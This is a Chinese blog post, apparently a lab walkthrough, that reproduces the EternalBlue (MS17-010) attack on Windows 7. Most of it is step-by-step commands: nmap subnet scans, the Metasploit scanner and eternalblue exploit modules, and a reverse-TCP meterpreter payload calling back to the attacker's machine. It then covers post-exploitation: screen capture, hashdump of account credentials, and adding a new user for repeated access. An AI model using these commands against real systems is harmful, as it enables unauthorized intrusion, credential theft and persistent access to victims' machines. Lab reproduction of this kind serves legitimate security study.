永恒之蓝漏洞复现过程

1.准备一台kali虚拟机,一台windows7
2.打开kali,查看kali的IP地址,命令:ifconfig
在这里插入图片描述

3.知道kali的IP地址为:192.168.43.116之后使用kali自带的nmap网络扫描工具扫描192.168.43.0网段下存活的主机,命令:nmap -sS 192.168.43.0/24
在这里插入图片描述

在这里我选择了IP地址为192.168.43.67的主机作为我的漏洞利用对象,因为我觉得他的主机端口开放的最多,成功的几率比较大,而且它的445端口也是开放的
4.接下来可以看看这个主机的操作系统,我用的命令是:nmap -O 192.168.43.67
在这里插入图片描述

这个主机的操作系统是windows 7|2008|8.1
我将利用永恒之蓝这个漏洞渗透windows7
5.在命令行中输入msfconsole 进入metasploit控制台
6.在命令行中输入search +你想要利用的有关漏洞。我在这里用的是:search blue
在这里插入图片描述

7.查到后,use 一个模块,选择auxiliary/scanner/smb/smb_ms17_010 (扫描命令)这个模块,目的是查看该主机是否存在ms17_010这个漏洞
命令:use auxiliary/scanner/smb/smb_ms17_010
查看这个模块需要设置什么参数,命令:show options
在这里插入图片描述

只关注RHOSTS(目标主机)和THREADS(线程默认是1)
命令:
set rhost 192.168.43.67
set threads 10
run
在这里插入图片描述

主机可能存在ms17_010漏洞,可以进行下一步动作了

8.知道存在ms17-010漏洞之后就可以实施攻击,攻击模块使用
use exploit/windows/smb/ms17_010_eternalblue
show options
设置目标主机:set rhost 192.168.43.67
search payload(可以搜索好几个关键次,这样更准确)搜索可以用的攻击载荷 payload是漏洞利用的时候做出的动作
设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp
设置监听主机:set 192.168.43.116
利用exploit进行攻击:exploit
在这里插入图片描述

返回了一个session,可以在meterpreter命令行上输入:help即可查看可以对受害主机做些什么
在这里插入图片描述

(下面还有很多,只放了一页)
查看一下受害主机的信息
在这里插入图片描述

截取受害主机的屏幕
在这里插入图片描述

将截取的屏幕保存在根目录下
接下来就可以为所欲为了
Shell进入目标主机的shell,hashdump是查看当前主机的账户和密码,密码是加密的,但是没有关系。我们可以利用shell在建立一个新的用户,方便我们再次利用这个受害者主机
在这里插入图片描述

  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值